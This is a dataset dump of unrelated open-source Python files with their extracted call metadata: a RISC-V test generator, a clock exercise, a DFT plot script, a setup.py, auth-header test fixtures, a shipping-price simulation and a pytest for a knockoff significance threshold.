'time.time', 'time', ({}, {}), '()', False, 'from time import time\n'), ((42, 12, 42, 62), 'fastlog.log.error', 'log.error', ({(42, 22, 42, 61): '"""Fatal: tested system is not available"""'}, {}), "('Fatal: tested system is not available')", False, 'from fastlog import log\n'), ((43, 12, 43, 23), 'sys.exit', 'sys.exit', ({(43, 21, 43, 22): '(1)'}, {}), '(1)', False, 'import sys\n'), ((45, 12, 45, 29), 'fastlog.log.success', 'log.success', ({(45, 24, 45, 28): '"""ok"""'}, {}), "('ok')", False, 'from fastlog import log\n'), ((53, 12, 53, 29), 'fastlog.log.success', 'log.success', ({(53, 24, 53, 28): '"""ok"""'}, {}), "('ok')", False, 'from fastlog import log\n'), ((55, 12, 55, 46), 'fastlog.log.error', 'log.error', ({(55, 22, 55, 45): '"""Fatal: wrong token(?)"""'}, {}), "('Fatal: wrong token(?)')", False, 
'from fastlog import log\n'), ((56, 12, 56, 23), 'sys.exit', 'sys.exit', ({(56, 21, 56, 22): '(1)'}, {}), '(1)', False, 'import sys\n'), ((92, 20, 92, 56), 'csv_reader.read_csv_as_dicts', 'read_csv_as_dicts', ({(92, 38, 92, 55): "cfg['input_file']"}, {}), "(cfg['input_file'])", False, 'from csv_reader import read_csv_as_dicts\n'), ((94, 12, 94, 57), 'fastlog.log.error', 'log.error', ({(94, 22, 94, 56): '"""Test description can not be read"""'}, {}), "('Test description can not be read')", False, 'from fastlog import log\n'), ((95, 12, 95, 24), 'fastlog.log.error', 'log.error', ({(95, 22, 95, 23): 'e'}, {}), '(e)', False, 'from fastlog import log\n'), ((96, 12, 96, 23), 'sys.exit', 'sys.exit', ({(96, 21, 96, 22): '(0)'}, {}), '(0)', False, 'import sys\n')] |
Giri2801/riscv-ctg | riscv_ctg/ctg.py | a90e03f0856bbdd106c3f6d51815af94707e711e | # See LICENSE.incore file for details
import os,re
import multiprocessing as mp
import time
import shutil
from riscv_ctg.log import logger
import riscv_ctg.utils as utils
import riscv_ctg.constants as const
from riscv_isac.cgf_normalize import expand_cgf
from riscv_ctg.generator import Generator
from math import *
from riscv_ctg.__init__ import __version__
def create_test(usage_str, node,label,base_isa,max_inst):
global op_template
    global randomize
global out_dir
global xlen
flen = 0
if 'opcode' not in node:
return
if 'ignore' in node:
logger.info("Ignoring :" + str(label))
if node['ignore']:
return
for opcode in node['opcode']:
op_node=None
if opcode not in op_template:
for op,foo in op_template.items():
if op!='metadata' and foo['std_op'] is not None and opcode==foo['std_op']:
op_node = foo
break
else:
op_node = op_template[opcode]
if op_node is None:
logger.warning("Skipping :" + str(opcode))
return
if xlen not in op_node['xlen']:
logger.warning("Skipping {0} since its not supported in current XLEN:".format(opcode))
return
if 'flen' in op_node:
if '.d' in opcode:
flen = 64
elif '.s' in opcode:
flen = 32
else:
flen = op_node['flen'][0]
#if flen not in op_node['flen']:
# return
fprefix = os.path.join(out_dir,str(label))
logger.info('Generating Test for :' + str(label) +"-" + opcode)
formattype = op_node['formattype']
gen = Generator(formattype,op_node,opcode,randomize,xlen,flen,base_isa)
op_comb = gen.opcomb(node)
val_comb = gen.valcomb(node)
instr_dict = gen.correct_val(gen.testreg(gen.swreg(gen.gen_inst(op_comb, val_comb, node))))
logger.info("Writing tests for :"+str(label))
my_dict = gen.reformat_instr(instr_dict)
gen.write_test(fprefix,node,label,my_dict, op_node, usage_str, max_inst)
def ctg(verbose, out, random ,xlen_arg, cgf_file,num_procs,base_isa, max_inst,list_duplicate):
global op_template
global randomize
global out_dir
global xlen
logger.level(verbose)
logger.info('****** RISC-V Compliance Test Generator {0} *******'.format(__version__ ))
logger.info('Copyright (c) 2020, InCore Semiconductors Pvt. Ltd.')
logger.info('All Rights Reserved.')
logger.info("Copying env folder to Output directory.")
env_dir = os.path.join(out,"env")
if not os.path.exists(env_dir):
shutil.copytree(const.env,env_dir)
xlen = int(xlen_arg)
out_dir = out
randomize = random
mytime = time.asctime(time.gmtime(time.time()) ) + ' GMT'
cgf_argument = ''
for cf in cgf_file:
cgf_argument += '// --cgf {} \\\n'.format(cf)
randomize_argument = ''
if random is True:
randomize_argument = ' \\\n// --randomize'
usage_str = const.usage.safe_substitute(base_isa=base_isa, \
cgf=cgf_argument, version = __version__, time=mytime, \
randomize=randomize_argument,xlen=str(xlen_arg))
op_template = utils.load_yaml(const.template_file)
cgf = expand_cgf(cgf_file,xlen,list_duplicate)
pool = mp.Pool(num_procs)
results = pool.starmap(create_test, [(usage_str, node,label,base_isa,max_inst) for label,node in cgf.items()])
pool.close()
| [((69, 4, 69, 25), 'riscv_ctg.log.logger.level', 'logger.level', ({(69, 17, 69, 24): 'verbose'}, {}), '(verbose)', False, 'from riscv_ctg.log import logger\n'), ((71, 4, 71, 70), 'riscv_ctg.log.logger.info', 'logger.info', ({(71, 16, 71, 69): '"""Copyright (c) 2020, InCore Semiconductors Pvt. Ltd."""'}, {}), "('Copyright (c) 2020, InCore Semiconductors Pvt. Ltd.')", False, 'from riscv_ctg.log import logger\n'), ((72, 4, 72, 39), 'riscv_ctg.log.logger.info', 'logger.info', ({(72, 16, 72, 38): '"""All Rights Reserved."""'}, {}), "('All Rights Reserved.')", False, 'from riscv_ctg.log import logger\n'), ((73, 4, 73, 58), 'riscv_ctg.log.logger.info', 'logger.info', ({(73, 16, 73, 57): '"""Copying env folder to Output directory."""'}, {}), "('Copying env folder to Output directory.')", False, 'from riscv_ctg.log import logger\n'), ((74, 14, 74, 37), 'os.path.join', 'os.path.join', ({(74, 27, 74, 30): 'out', (74, 31, 74, 36): '"""env"""'}, {}), "(out, 'env')", False, 'import os, re\n'), ((90, 18, 90, 54), 'riscv_ctg.utils.load_yaml', 'utils.load_yaml', ({(90, 34, 90, 53): 'const.template_file'}, {}), '(const.template_file)', True, 'import riscv_ctg.utils as utils\n'), ((91, 10, 91, 50), 'riscv_isac.cgf_normalize.expand_cgf', 'expand_cgf', ({(91, 21, 91, 29): 'cgf_file', (91, 30, 91, 34): 'xlen', (91, 35, 91, 49): 'list_duplicate'}, {}), '(cgf_file, xlen, list_duplicate)', False, 'from riscv_isac.cgf_normalize import expand_cgf\n'), ((92, 11, 92, 29), 'multiprocessing.Pool', 'mp.Pool', ({(92, 19, 92, 28): 'num_procs'}, {}), '(num_procs)', True, 'import multiprocessing as mp\n'), ((56, 14, 56, 79), 'riscv_ctg.generator.Generator', 'Generator', ({(56, 24, 56, 34): 'formattype', (56, 35, 56, 42): 'op_node', (56, 43, 56, 49): 'opcode', (56, 50, 56, 59): 'randomize', (56, 60, 56, 64): 'xlen', (56, 65, 56, 69): 'flen', (56, 70, 56, 78): 'base_isa'}, {}), '(formattype, op_node, opcode, randomize, xlen, flen, base_isa)', False, 'from riscv_ctg.generator import Generator\n'), ((75, 11, 75, 34), 'os.path.exists', 'os.path.exists', ({(75, 26, 75, 33): 'env_dir'}, {}), '(env_dir)', False, 'import os, re\n'), ((76, 8, 76, 42), 'shutil.copytree', 'shutil.copytree', ({(76, 24, 76, 33): 'const.env', (76, 34, 76, 41): 'env_dir'}, {}), '(const.env, env_dir)', False, 'import shutil\n'), ((80, 38, 80, 49), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n')] |
ASHISHKUMAR2411/Programming-CookBook | Back-End/Python/timers/clock_named_tuple.py | 9c60655d64d21985ccb4196360858d98344701f9 | from collections import namedtuple
MainTimer = namedtuple('MainTimer', 'new_time_joined, end_period, new_weekday, days')
def add_time(start, duration, start_weekday=None):
weekdays = [
'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday',
'Saturday', 'Sunday'
]
start_time, period = start.split(' ')
def process_time():
current_hour, current_minute = ([int(t) for t in start_time.split(':')])
end_hour, end_minute = ([int(d) for d in duration.split(':')])
# Adds Current time plus End Time Total
end_hours, end_mins = (current_hour + end_hour, current_minute + end_minute)
# Calculates Total days passed
days = int(end_hours/24)
# Calculates New Time
new_time_array = [str(end_hours % 12 + end_mins // 60), ':', str(end_mins % 60).rjust(2, '0')]
new_time_joined = ''.join(new_time_array)
end_period = [period]
# Clock, calculates the days elapsed
clock = end_hours // 12
if start_weekday:
start_day_idx = weekdays.index(start_weekday.title())
new_weekday = weekdays[(start_day_idx + days % 7) % 7]
else:
new_weekday = False
# Figure out whether is AM or PM
for i in range(clock):
if end_period[-1].lower() == 'am':
end_period.append('PM')
else:
end_period.append('AM')
return MainTimer(new_time_joined, end_period, new_weekday, days)
# Triggers process time function
timed = process_time()
def process_output():
new_time = f'New Time is >>> {timed.new_time_joined} {timed.end_period[-1]}'
if timed.new_weekday:
new_time += f'- {timed.new_weekday} -'
if timed.days == 1 and (period != timed.end_period or timed.end_period == 'AM'):
new_time += ' (new_day)'
elif timed.days > 1:
new_time += f' -Total days: {timed.days}- <<'
return new_time
new_time = process_output()
return new_time
print('---'*30)
x = add_time('10:00 AM', '54:00', 'Monday')
print(x)
print('---'*30) | [((4, 12, 4, 85), 'collections.namedtuple', 'namedtuple', ({(4, 23, 4, 34): '"""MainTimer"""', (4, 36, 4, 84): '"""new_time_joined, end_period, new_weekday, days"""'}, {}), "('MainTimer', 'new_time_joined, end_period, new_weekday, days')", False, 'from collections import namedtuple\n')] |
jlaumonier/mlsurvey | mlsurvey/visualize/__init__.py | 373598d067c7f0930ba13fe8da9756ce26eecbaf | from .analyze_logs import AnalyzeLogs
from .search_interface import SearchInterface
from .detail_interface import DetailInterface
from .user_interface import UserInterface
from .visualize_log_detail import VisualizeLogDetail
| [] |
phunc20/dsp | stanford/sms-tools/lectures/02-DFT/plots-code/idft.py | e7c496eb5fd4b8694eab0fc049cf98a5e3dfd886 | import matplotlib.pyplot as plt
import numpy as np
import sys
sys.path.append('../../../software/models/')
import dftModel as DFT
import math
k0 = 8.5
N = 64
w = np.ones(N)
x = np.cos(2*np.pi*k0/N*np.arange(-N/2,N/2))
mX, pX = DFT.dftAnal(x, w, N)
y = DFT.dftSynth(mX, pX, N)
plt.figure(1, figsize=(9.5, 5))
plt.subplot(311)
plt.title('positive freq. magnitude spectrum in dB: mX')
plt.plot(np.arange(mX.size), mX, 'r', lw=1.5)
plt.axis([0,mX.size, min(mX), max(mX)+1])
plt.subplot(312)
plt.title('positive freq. phase spectrum: pX')
plt.plot(np.arange(pX.size), pX, 'c', lw=1.5)
plt.axis([0, pX.size,-np.pi,np.pi])
plt.subplot(313)
plt.title('inverse spectrum: IDFT(X)')
plt.plot(np.arange(-N/2, N/2), y,'b', lw=1.5)
plt.axis([-N/2,N/2-1,min(y), max(y)])
plt.tight_layout()
plt.savefig('idft.png')
plt.show()
| [((5, 0, 5, 44), 'sys.path.append', 'sys.path.append', ({(5, 16, 5, 43): '"""../../../software/models/"""'}, {}), "('../../../software/models/')", False, 'import sys\n'), ((11, 4, 11, 14), 'numpy.ones', 'np.ones', ({(11, 12, 11, 13): 'N'}, {}), '(N)', True, 'import numpy as np\n'), ((13, 9, 13, 29), 'dftModel.dftAnal', 'DFT.dftAnal', ({(13, 21, 13, 22): 'x', (13, 24, 13, 25): 'w', (13, 27, 13, 28): 'N'}, {}), '(x, w, N)', True, 'import dftModel as DFT\n'), ((14, 4, 14, 27), 'dftModel.dftSynth', 'DFT.dftSynth', ({(14, 17, 14, 19): 'mX', (14, 21, 14, 23): 'pX', (14, 25, 14, 26): 'N'}, {}), '(mX, pX, N)', True, 'import dftModel as DFT\n'), ((16, 0, 16, 31), 'matplotlib.pyplot.figure', 'plt.figure', (), '', True, 'import matplotlib.pyplot as plt\n'), ((17, 0, 17, 16), 'matplotlib.pyplot.subplot', 'plt.subplot', ({(17, 12, 17, 15): '(311)'}, {}), '(311)', True, 'import matplotlib.pyplot as plt\n'), ((18, 0, 18, 56), 'matplotlib.pyplot.title', 'plt.title', ({(18, 10, 18, 55): '"""positive freq. magnitude spectrum in dB: mX"""'}, {}), "('positive freq. magnitude spectrum in dB: mX')", True, 'import matplotlib.pyplot as plt\n'), ((22, 0, 22, 16), 'matplotlib.pyplot.subplot', 'plt.subplot', ({(22, 12, 22, 15): '(312)'}, {}), '(312)', True, 'import matplotlib.pyplot as plt\n'), ((23, 0, 23, 46), 'matplotlib.pyplot.title', 'plt.title', ({(23, 10, 23, 45): '"""positive freq. phase spectrum: pX"""'}, {}), "('positive freq. phase spectrum: pX')", True, 'import matplotlib.pyplot as plt\n'), ((25, 0, 25, 35), 'matplotlib.pyplot.axis', 'plt.axis', ({(25, 9, 25, 34): '[0, pX.size, -np.pi, np.pi]'}, {}), '([0, pX.size, -np.pi, np.pi])', True, 'import matplotlib.pyplot as plt\n'), ((27, 0, 27, 16), 'matplotlib.pyplot.subplot', 'plt.subplot', ({(27, 12, 27, 15): '(313)'}, {}), '(313)', True, 'import matplotlib.pyplot as plt\n'), ((28, 0, 28, 38), 'matplotlib.pyplot.title', 'plt.title', ({(28, 10, 28, 37): '"""inverse spectrum: IDFT(X)"""'}, {}), "('inverse spectrum: IDFT(X)')", True, 'import matplotlib.pyplot as plt\n'), ((32, 0, 32, 18), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((33, 0, 33, 23), 'matplotlib.pyplot.savefig', 'plt.savefig', ({(33, 12, 33, 22): '"""idft.png"""'}, {}), "('idft.png')", True, 'import matplotlib.pyplot as plt\n'), ((34, 0, 34, 10), 'matplotlib.pyplot.show', 'plt.show', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((19, 9, 19, 27), 'numpy.arange', 'np.arange', ({(19, 19, 19, 26): 'mX.size'}, {}), '(mX.size)', True, 'import numpy as np\n'), ((24, 9, 24, 27), 'numpy.arange', 'np.arange', ({(24, 19, 24, 26): 'pX.size'}, {}), '(pX.size)', True, 'import numpy as np\n'), ((29, 9, 29, 29), 'numpy.arange', 'np.arange', ({(29, 19, 29, 23): '(-N / 2)', (29, 25, 29, 28): '(N / 2)'}, {}), '(-N / 2, N / 2)', True, 'import numpy as np\n'), ((12, 24, 12, 43), 'numpy.arange', 'np.arange', ({(12, 34, 12, 38): '-N / 2', (12, 39, 12, 42): 'N / 2'}, {}), '(-N / 2, N / 2)', True, 'import numpy as np\n')] |
jerzydziewierz/typobs | setup.py | 15fa697386f5fb3a1df53b865557c338be235d91 | # setup.py as described in:
# https://stackoverflow.com/questions/27494758/how-do-i-make-a-python-script-executable
# to install on your system, run:
# > pip install -e .
from setuptools import setup, find_packages
setup(
name='typobs',
version='0.0.3',
entry_points={
'console_scripts': [
'to_obsidian=to_obsidian:run',
'to_typora=to_typora:run',
]
},
packages=find_packages(),
# metadata to display on PyPI
author="Jerzy Dziewierz",
author_email="[email protected]",
description="Convert between Typora and Obsidian link styles",
keywords="Typora Obsidian Markdown link converter",
url="https://github.com/jerzydziewierz/typobs", # project home page, if any
project_urls={
"Bug Tracker": "https://github.com/jerzydziewierz/typobs",
"Documentation": "https://github.com/jerzydziewierz/typobs",
"Source Code": "https://github.com/jerzydziewierz/typobs",
},
classifiers=[
"Programming Language :: Python",
"Topic :: Documentation",
"Topic :: Software Development :: Documentation",
"Topic :: Office/Business",
"Topic :: Text Processing :: Filters",
"Topic :: Text Processing :: Markup",
"Development Status :: 5 - Production/Stable",
"Environment :: Console",
"License :: OSI Approved :: Apache Software License",
]
) | [((16, 13, 16, 28), 'setuptools.find_packages', 'find_packages', ({}, {}), '()', False, 'from setuptools import setup, find_packages\n')] |
ehelms/system-baseline-backend | tests/fixtures.py | 729cc8ba53119a7ed397fb3ea3d46f9ecedb8528 | """
decoded AUTH_HEADER (newlines added for readability):
{
"identity": {
"account_number": "1234",
"internal": {
"org_id": "5678"
},
"type": "User",
"user": {
"email": "[email protected]",
"first_name": "Firstname",
"is_active": true,
"is_internal": true,
"is_org_admin": false,
"last_name": "Lastname",
"locale": "en_US",
"username": "test_username"
}
}
"entitlements": {
"smart_management": {
"is_entitled": true
}
}
}
"""
AUTH_HEADER = {
"X-RH-IDENTITY": "eyJpZGVudGl0eSI6eyJhY2NvdW50X251bWJlciI6"
"IjEyMzQiLCJpbnRlcm5hbCI6eyJvcmdfaWQiOiI1"
"Njc4In0sInR5cGUiOiJVc2VyIiwidXNlciI6eyJl"
"bWFpbCI6InRlc3RAZXhhbXBsZS5jb20iLCJmaXJz"
"dF9uYW1lIjoiRmlyc3RuYW1lIiwiaXNfYWN0aXZl"
"Ijp0cnVlLCJpc19pbnRlcm5hbCI6dHJ1ZSwiaXNf"
"b3JnX2FkbWluIjpmYWxzZSwibGFzdF9uYW1lIjoi"
"TGFzdG5hbWUiLCJsb2NhbGUiOiJlbl9VUyIsInVz"
"ZXJuYW1lIjoidGVzdF91c2VybmFtZSJ9fSwiZW50"
"aXRsZW1lbnRzIjogeyJzbWFydF9tYW5hZ2VtZW50"
"IjogeyJpc19lbnRpdGxlZCI6IHRydWUgfX19Cg=="
}
AUTH_HEADER_NO_ENTITLEMENTS = {
"X-RH-IDENTITY": "eyJpZGVudGl0eSI6eyJhY2NvdW50X251bWJlciI6Ij"
"EyMzQiLCJ0eXBlIjoiVXNlciIsInVzZXIiOnsidXNl"
"cm5hbWUiOiJ0ZXN0X3VzZXJuYW1lIiwiZW1haWwiOi"
"J0ZXN0QGV4YW1wbGUuY29tIiwiZmlyc3RfbmFtZSI6"
"IkZpcnN0bmFtZSIsImxhc3RfbmFtZSI6Ikxhc3RuYW"
"1lIiwiaXNfYWN0aXZlIjp0cnVlLCJpc19vcmdfYWRt"
"aW4iOmZhbHNlLCJpc19pbnRlcm5hbCI6dHJ1ZSwibG"
"9jYWxlIjoiZW5fVVMifSwiaW50ZXJuYWwiOnsib3Jn"
"X2lkIjoiNTY3OCJ9fX0KCg=="
}
AUTH_HEADER_SMART_MGMT_FALSE = {
"X-RH-IDENTITY": "eyJpZGVudGl0eSI6eyJhY2NvdW50X251bWJlciI6"
"IjEyMzQiLCJpbnRlcm5hbCI6eyJvcmdfaWQiOiAi"
"NTY3OCJ9LCJ0eXBlIjogIlVzZXIiLCJ1c2VyIjp7"
"ImVtYWlsIjoidGVzdEBleGFtcGxlLmNvbSIsImZp"
"cnN0X25hbWUiOiJGaXJzdG5hbWUiLCJpc19hY3Rp"
"dmUiOnRydWUsImlzX2ludGVybmFsIjp0cnVlLCJp"
"c19vcmdfYWRtaW4iOmZhbHNlLCJsYXN0X25hbWUi"
"OiJMYXN0bmFtZSIsImxvY2FsZSI6ImVuX1VTIiwi"
"dXNlcm5hbWUiOiJ0ZXN0X3VzZXJuYW1lIn19LCJl"
"bnRpdGxlbWVudHMiOnsic21hcnRfbWFuYWdlbWVu"
"dCI6eyJpc19lbnRpdGxlZCI6IGZhbHNlfX19Cg=="
}
# this can't happen in real life, adding test anyway
AUTH_HEADER_NO_ACCT_BUT_HAS_ENTS = {
"X-RH-IDENTITY": "eyJpZGVudGl0eSI6eyJpbnRlcm5hbCI6eyJvcmdf"
"aWQiOiAiNTY3OCJ9LCJ0eXBlIjogIlVzZXIiLCJ1"
"c2VyIjp7ImVtYWlsIjoidGVzdEBleGFtcGxlLmNv"
"bSIsImZpcnN0X25hbWUiOiJGaXJzdG5hbWUiLCJp"
"c19hY3RpdmUiOnRydWUsImlzX2ludGVybmFsIjp0"
"cnVlLCJpc19vcmdfYWRtaW4iOmZhbHNlLCJsYXN0"
"X25hbWUiOiJMYXN0bmFtZSIsImxvY2FsZSI6ImVu"
"X1VTIiwidXNlcm5hbWUiOiJ0ZXN0X3VzZXJuYW1l"
"In19LCJlbnRpdGxlbWVudHMiOnsic21hcnRfbWFu"
"YWdlbWVudCI6eyJpc19lbnRpdGxlZCI6IHRydWV9"
"fX0K"
}
"""
decoded AUTH_HEADER_NO_ACCT (newlines added for readability):
{
"identity": {
"internal": {
"org_id": "9999"
},
"type": "User",
"user": {
"email": "[email protected]",
"first_name": "No",
"is_active": true,
"is_internal": true,
"is_org_admin": false,
"last_name": "Number",
"locale": "en_US",
"username": "nonumber"
}
}
}
"""
AUTH_HEADER_NO_ACCT = {
"X-RH-IDENTITY": "eyJpZGVudGl0eSI6eyJ0eXBlIjoiVXNlciIsInVzZXIiO"
"nsidXNlcm5hbWUiOiJub251bWJlciIsImVtYWlsIjoibm"
"9udW1iZXJAZXhhbXBsZS5jb20iLCJmaXJzdF9uYW1lIjo"
"iTm8iLCJsYXN0X25hbWUiOiJOdW1iZXIiLCJpc19hY3Rp"
"dmUiOnRydWUsImlzX29yZ19hZG1pbiI6ZmFsc2UsImlzX"
"2ludGVybmFsIjp0cnVlLCJsb2NhbGUiOiJlbl9VUyJ9LC"
"JpbnRlcm5hbCI6eyJvcmdfaWQiOiI5OTk5In19fQo="
}
BASELINE_ONE_LOAD = {
"baseline_facts": [
{"name": "arch", "value": "x86_64"},
{"name": "phony.arch.fact", "value": "some value"},
],
"display_name": "arch baseline",
}
BASELINE_TWO_LOAD = {
"baseline_facts": [
{"name": "memory", "value": "64GB"},
{"name": "cpu_sockets", "value": "16"},
],
"display_name": "cpu + mem baseline",
}
BASELINE_THREE_LOAD = {
"baseline_facts": [
{"name": "nested", "values": [{"name": "cpu_sockets", "value": "16"}]}
],
"display_name": "cpu + mem baseline",
}
BASELINE_PARTIAL_ONE = {"baseline_facts": [{"name": "hello", "value": "world"}]}
BASELINE_PARTIAL_TWO = {
"display_name": "ABCDE",
"baseline_facts": [
{
"name": "hello",
"values": [
{"name": "nested_one", "value": "one"},
{"name": "nested_two", "value": "two"},
],
}
],
}
BASELINE_PARTIAL_CONFLICT = {"display_name": "arch baseline"}
CREATE_FROM_INVENTORY = {
"display_name": "created_from_inventory",
"inventory_uuid": "df925152-c45d-11e9-a1f0-c85b761454fa",
}
SYSTEM_WITH_PROFILE = {
"account": "9876543",
"bios_uuid": "e380fd4a-28ae-11e9-974c-c85b761454fb",
"created": "2018-01-31T13:00:00.100010Z",
"display_name": None,
"fqdn": None,
"id": "bbbbbbbb-28ae-11e9-afd9-c85b761454fa",
"insights_id": "00000000-28af-11e9-9ab0-c85b761454fa",
"ip_addresses": ["10.0.0.3", "2620:52:0:2598:5054:ff:fecd:ae15"],
"mac_addresses": ["52:54:00:cd:ae:00", "00:00:00:00:00:00"],
"rhel_machine_id": None,
"satellite_id": None,
"subscription_manager_id": "RHN Classic and Red Hat Subscription Management",
"system_profile": {
"salutation": "hi",
"system_profile_exists": False,
"installed_packages": [
"openssl-1.1.1c-2.fc30.x86_64",
"python2-libs-2.7.16-2.fc30.x86_64",
],
"id": "bbbbbbbb-28ae-11e9-afd9-c85b761454fa",
},
"tags": [],
"updated": "2018-01-31T14:00:00.500000Z",
}
| [] |
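# Illustrative check (hypothetical, not part of the fixture module): the X-RH-IDENTITY
# value is base64-encoded JSON, so it can be decoded to confirm it matches the payload
# documented in the docstrings above.
import base64
import json

payload = json.loads(base64.b64decode(AUTH_HEADER["X-RH-IDENTITY"]))
print(payload["identity"]["account_number"])                       # "1234" per the docstring
print(payload["entitlements"]["smart_management"]["is_entitled"])  # True per the docstring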
Elfenreigen/MCM-2021-C-SJTU-Test | 2021-02-03/2.py | 98e3b14dbe7bb0ab4a76245d14e4691050704ac9 | #####Time Flow Simulation######
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from datetime import timedelta
import datetime
import csv
data=pd.read_excel('CF66-all.xlsx')
data.sort_values(by=['WBL_AUD_DT'],ascending=True,inplace=True)
or_data=pd.read_excel('CF66-ordinary.xlsx')
rule=pd.read_excel('6. Existing pricing strategy.xlsx')
or_name=or_data['WBL_NUM'].unique()
data['ordinary']=0
for i in range(len(data)):
if data.iloc[i,2] in or_name:
data.iloc[i,9]=1
data['volume']=data['CNTR_TYPE']
for i in range(len(data)):
data.iloc[i,10]=int(data.iloc[i,10][0:2])
raw_data=data.groupby('SVVD')
data_to_list=list(raw_data)
raw_list=[]
for i in data_to_list:
raw_list.append(i[1])
total_volume=raw_data['volume'].sum()*1.2
# Spreadsheet column names are Chinese: '装港'/'卸港' = loading/discharge port ('营口'/'海口' = Yingkou/Haikou),
# '开始天数'/'结束天数' = pricing-window start/end day, '舱位利用率阈值' = slot-utilization threshold, '涨价/降价' = raise/lower price.
thisrule=rule.groupby(['装港','卸港']).get_group(('营口','海口'))
group_rule=thisrule.groupby(['开始天数','结束天数'])
rule_to_list=list(group_rule)
day_list=[]
rule_list=[]
for i in rule_to_list:
day_list.append(i[0])
rule_list.append(i[1])
m=datetime.timedelta(days=14)
newlist=[]
for i in raw_list:
i['WBL_AUD_DT']=pd.to_datetime(i['WBL_AUD_DT'])
m=datetime.timedelta(days=14)
j=i[i['WBL_AUD_DT']>=i['WBL_AUD_DT'].max()-m]
newlist.append(j)
del(raw_list)
for i in newlist:
i['acc_volume']=i['volume'].cumsum()
i['total_volume']=i['volume'].sum()*1.2
m=datetime.timedelta(days=14)
i['day']=(i['WBL_AUD_DT']-i['WBL_AUD_DT'].max()+m).dt.days
i['acc_rate']=i['acc_volume']/i['total_volume']*100
i['new_AMT']=i['AMT']
for k in range(len(newlist)):
acc_20gp=0
acc_40gp=0
acc_40hq=0
print('k='+str(k))
for i in range(len(day_list)):
print('i='+str(i))
first_day=day_list[i][0]
last_day=day_list[i][1]
flag=[0]*len(rule_list[i])
for j in range(len(newlist[k])):
if newlist[k].iloc[j]['day']>=first_day and newlist[k].iloc[j]['day']<last_day and newlist[k].iloc[j]['ordinary']==1:
for z in range(len(rule_list[i])):
print('z='+str(z))
if newlist[k].iloc[j]['acc_rate']>rule_list[i].iloc[z]['舱位利用率阈值']and rule_list[i].iloc[z]['涨价/降价']=='涨价':
if flag[z]==0:
flag[z]=1
acc_20gp+=rule_list[i].iloc[z]['20GP']
acc_40gp+=rule_list[i].iloc[z]['40GP']
acc_40hq+=rule_list[i].iloc[z]['40HQ']
if newlist[k].iloc[j]['acc_rate']<rule_list[i].iloc[z]['舱位利用率阈值']and rule_list[i].iloc[z]['涨价/降价']=='降价':
if flag[z]==0:
flag[z]=1
acc_20gp-=rule_list[i].iloc[z]['20GP']
acc_40gp-=rule_list[i].iloc[z]['40GP']
acc_40hq-=rule_list[i].iloc[z]['40HQ']
print(flag)
print(acc_20gp)
print(acc_40gp)
print(acc_40hq)
if newlist[k].iloc[j]['CNTR_TYPE']=='20GP':
newlist[k].iloc[j,15]+=acc_20gp
if newlist[k].iloc[j]['CNTR_TYPE']=='40GP':
newlist[k].iloc[j,15]+=acc_40gp
if newlist[k].iloc[j]['CNTR_TYPE']=='40HQ':
newlist[k].iloc[j,15]+=acc_40hq
for i in newlist:
print('revenue:'+str(i['AMT'].sum()))
print('newrevenue:'+str(i['new_AMT'].sum()))
newlist[0].to_csv('voyage1.csv')
newlist[1].to_csv('voyage2.csv')
newlist[2].to_csv('voyage3.csv')
| [((9, 5, 9, 35), 'pandas.read_excel', 'pd.read_excel', ({(9, 19, 9, 34): '"""CF66-all.xlsx"""'}, {}), "('CF66-all.xlsx')", True, 'import pandas as pd\n'), ((11, 8, 11, 43), 'pandas.read_excel', 'pd.read_excel', ({(11, 22, 11, 42): '"""CF66-ordinary.xlsx"""'}, {}), "('CF66-ordinary.xlsx')", True, 'import pandas as pd\n'), ((12, 5, 12, 55), 'pandas.read_excel', 'pd.read_excel', ({(12, 19, 12, 54): '"""6. Existing pricing strategy.xlsx"""'}, {}), "('6. Existing pricing strategy.xlsx')", True, 'import pandas as pd\n'), ((47, 2, 47, 29), 'datetime.timedelta', 'datetime.timedelta', (), '', False, 'import datetime\n'), ((51, 17, 51, 48), 'pandas.to_datetime', 'pd.to_datetime', ({(51, 32, 51, 47): "i['WBL_AUD_DT']"}, {}), "(i['WBL_AUD_DT'])", True, 'import pandas as pd\n'), ((52, 3, 52, 30), 'datetime.timedelta', 'datetime.timedelta', (), '', False, 'import datetime\n'), ((61, 3, 61, 30), 'datetime.timedelta', 'datetime.timedelta', (), '', False, 'import datetime\n')] |
qrebjock/fanok | tests/test_selection.py | 5c3b95ca5f2ec90af7060c21409a11130bd350bd | import pytest
import numpy as np
from fanok.selection import adaptive_significance_threshold
@pytest.mark.parametrize(
"w, q, offset, expected",
[
([1, 2, 3, 4, 5], 0.1, 0, 1),
([-1, 2, -3, 4, 5], 0.1, 0, 4),
([-3, -2, -1, 0, 1, 2, 3], 0.1, 0, np.inf),
([-3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 0.1, 0, 4),
([-3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 0.15, 0, 3),
(
[-1.52, 1.93, -0.76, -0.35, 1.21, -0.39, 0.08, -1.45, 0.31, -1.38],
0.1,
0,
1.93,
),
],
)
def test_adaptive_significance_threshold(w, q, offset, expected):
w = np.array(w)
threshold = adaptive_significance_threshold(w, q, offset=offset)
assert threshold == expected
